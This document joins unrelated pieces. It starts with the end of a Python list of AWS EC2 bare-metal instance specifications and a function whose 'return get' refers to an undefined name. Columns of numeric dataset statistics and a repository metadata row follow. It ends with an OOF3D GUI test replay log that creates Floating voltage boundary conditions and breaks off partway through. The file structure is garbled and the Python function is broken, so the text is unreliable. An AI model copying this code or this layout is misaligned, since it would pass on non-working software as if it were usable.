'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.6}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 196608}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'Gpus': [{'Name': 'T4', 'Manufacturer': 'NVIDIA', 'Count': 8, 'MemoryInfo': {'SizeInMiB': 16384}}], 'TotalGpuMemoryInMiB': 131072, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'g4dn.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1800, 'Disks': [{'SizeInGB': 900, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': 
{'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'GpuInfo': {'Gpus': [{'Name': 'T4', 'Manufacturer': 'NVIDIA', 'Count': 8, 'MemoryInfo': {'SizeInMiB': 16384}}], 'TotalGpuMemoryInMiB': 131072}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'TotalSizeInGB': 60000, 'Disks': [{'SizeInGB': 7500, 'Count': 8, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'i3en.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 60000, 'Disks': [{'SizeInGB': 7500, 'Count': 8, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '100 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 
'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 393216, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.metal', 'CurrentGeneration': 
True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 393216}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 
'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 96, 'SizeInMiB': 786432, 'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5d.metal', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': True, 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 96}, 'MemoryInfo': {'SizeInMiB': 786432}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3600, 'Disks': [{'SizeInGB': 900, 'Count': 4, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '25 Gigabit', 'MaximumNetworkInterfaces': 15, 'Ipv4AddressesPerInterface': 50, 'Ipv6AddressesPerInterface': 50, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}] # noqa: E501
def get_instances_list() -> list:
    '''Return the list of EC2 instance-type description dicts.

    Each element mirrors the shape of an AWS EC2 ``DescribeInstanceTypes``
    ``InstanceTypeInfo`` entry (keys such as ``InstanceType``,
    ``ProcessorInfo``, ``VCpuInfo``, ``MemoryInfo``, ``NetworkInfo``); every
    entry visible above has ``'BareMetal': True``.

    NOTE(review): ``return get`` references an undefined name — the source
    appears truncated here. Presumably the original returned the module-level
    list literal defined above this function; confirm against the complete
    file before relying on this function.
    '''
    # pylint: disable=all
    return get
| 2,155
| 25,671
| 0.736272
| 1,904
| 25,860
| 9.987395
| 0.068277
| 0.049222
| 0.081405
| 0.098443
| 0.982594
| 0.97013
| 0.969499
| 0.964872
| 0.964872
| 0.948359
| 0
| 0.045612
| 0.070804
| 25,860
| 11
| 25,672
| 2,350.909091
| 0.745766
| 0.004872
| 0
| 0
| 1
| 0
| 0.676839
| 0.267299
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 12
|
43d5272215299d8dc0ce8fc8524389ef215e8b88
| 59,228
|
py
|
Python
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 31
|
2015-04-01T15:59:36.000Z
|
2022-03-18T20:21:47.000Z
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 3
|
2015-02-06T19:30:24.000Z
|
2017-05-25T14:14:31.000Z
|
TEST3D/GUI/0011213_page_bc/log.py
|
usnistgov/OOF3D
|
4fd423a48aea9c5dc207520f02de53ae184be74c
|
[
"X11"
] | 7
|
2015-01-23T15:19:22.000Z
|
2021-06-09T09:03:59.000Z
|
# -*- python -*-
# This software was produced by NIST, an agency of the U.S. government,
# and by statute is not subject to copyright in the United States.
# Recipients of this software assume all responsibilities associated
# with its operation, modification and maintenance. However, to
# facilitate maintenance we ask that before distributing modified
# versions of this software, you first contact the authors at
# oof_manager@nist.gov.
import tests
#Testing Boundary Condition creation using Floating on Voltage Field
#The equation here is Coulomb_Eqn
findWidget('OOF3D').resize(550, 350)
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Microstructure')
checkpoint page installed Microstructure
findWidget('OOF3D:Microstructure Page:Pane').set_position(225)
findWidget('OOF3D:Microstructure Page:Pane').set_position(156)
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
findMenu(findWidget('OOF3D:MenuBar'), 'File:Load:Data').activate()
checkpoint toplevel widget mapped Dialog-Data
findWidget('Dialog-Data').resize(190, 67)
findWidget('Dialog-Data:filename').set_text('TEST_DATA/two_walls.skeleton')
findWidget('Dialog-Data:gtk-ok').clicked()
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint pixel page updated
checkpoint named analysis chooser set
checkpoint active area status updated
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint Field page sensitized
checkpoint Materials page updated
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint Solver page sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint meshable button set
checkpoint meshable button set
checkpoint microstructure page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page selection sensitized
checkpoint skeleton selection page updated
checkpoint skeleton selection page groups sensitized
checkpoint named analysis chooser set
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint skeleton selection page selection sensitized
checkpoint Solver page sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page groups sensitized
checkpoint skeleton selection page updated
checkpoint pinnodes page sensitized
findWidget('OOF3D Activity Viewer').resize(400, 300)
checkpoint pinnodes page sensitized
checkpoint pinnodes page sensitized
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint boundary page updated
checkpoint OOF.File.Load.Data
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'FE Mesh')
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint page installed FE Mesh
findWidget('OOF3D:FE Mesh Page:Pane').set_position(304)
findWidget('OOF3D:FE Mesh Page:New').clicked()
checkpoint toplevel widget mapped Dialog-Create a new mesh
findWidget('Dialog-Create a new mesh').resize(345, 153)
findWidget('Dialog-Create a new mesh:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(553, 200)
checkpoint named analysis chooser set
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Mesh.New
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Fields & Equations')
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint page installed Fields & Equations
findWidget('OOF3D').resize(667, 350)
findWidget('OOF3D:Fields & Equations Page:HPane').set_position(298)
findWidget('OOF3D:Fields & Equations Page:HPane:Fields:Voltage defined').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Field.Define
findWidget('OOF3D:Fields & Equations Page:HPane:Fields:Voltage active').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Field.Activate
findWidget('OOF3D:Fields & Equations Page:HPane:Equations:Coulomb_Eqn active').clicked()
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
# --------------------------------------------------------------------------
# Machine-generated GUI replay log (OOF3D gtklogger format).
# Ordinary lines are replayed as Python statements; "checkpoint" lines are
# harness directives that synchronize replay with application events.
# NOTE(review): do not hand-edit replayed strings or reorder lines — the
# recorded sequence (including window resizes) is matched against the live
# GUI.  The name 'floating_continiumXmax' below misspells "continuum", but
# it is recorded consistently (set_text + assert) and may be referenced
# later in the log; leave it as-is unless the whole log is re-recorded.
# --------------------------------------------------------------------------
# Trailing checkpoints from the preceding OOF.Subproblem.Equation.Activate.
checkpoint Field page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint mesh page subproblems sensitized
checkpoint mesh page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint OOF.Subproblem.Equation.Activate
# Switch to the Boundary Conditions page.
setComboBox(findWidget('OOF3D:Navigation:PageMenu'), 'Boundary Conditions')
checkpoint page installed Boundary Conditions
# Floating BC, Constant Profile, Xmax face.
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Chooser'), 'Floating')
findWidget('Dialog-New Boundary Condition:name:Auto').clicked()
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(983, 200)
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax'])
# Floating BC, Continuum Profile, Xmax face (recorded name keeps the
# 'continium' typo — see header note).
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continiumXmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
findWidget('OOF3D Messages 1').resize(1023, 200)
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
assert tests.boundaryConditionCheck(['floating_constantXmax','floating_continiumXmax'])
# Floating BC, Constant Profile, Xmin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Xmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantXmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, Xmin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumXmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, Ymax face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Ymax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, Ymax face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, Ymin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Ymin')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantYmin')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, Ymin face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumYmin')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Constant Profile, Zmax face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(467, 309)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:boundary'), 'Zmax')
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_constantZmax')
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Constant Profile')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint Field page sensitized
checkpoint Solver page sensitized
checkpoint named analysis chooser set
checkpoint Solver page sensitized
checkpoint OOF.Mesh.Boundary_Conditions.New
# Floating BC, Continuum Profile, Zmax face.
findWidget('OOF3D Messages 1').resize(983, 200)
findWidget('OOF3D:Boundary Conditions Page:Condition:New').clicked()
checkpoint toplevel widget mapped Dialog-New Boundary Condition
findWidget('Dialog-New Boundary Condition').resize(412, 265)
setComboBox(findWidget('Dialog-New Boundary Condition:condition:Floating:profile:Chooser'), 'Continuum Profile')
findWidget('Dialog-New Boundary Condition').resize(467, 309)
findWidget('Dialog-New Boundary Condition:name:Text').set_text('floating_continuumZmax')
findWidget('Dialog-New Boundary Condition:gtk-ok').clicked()
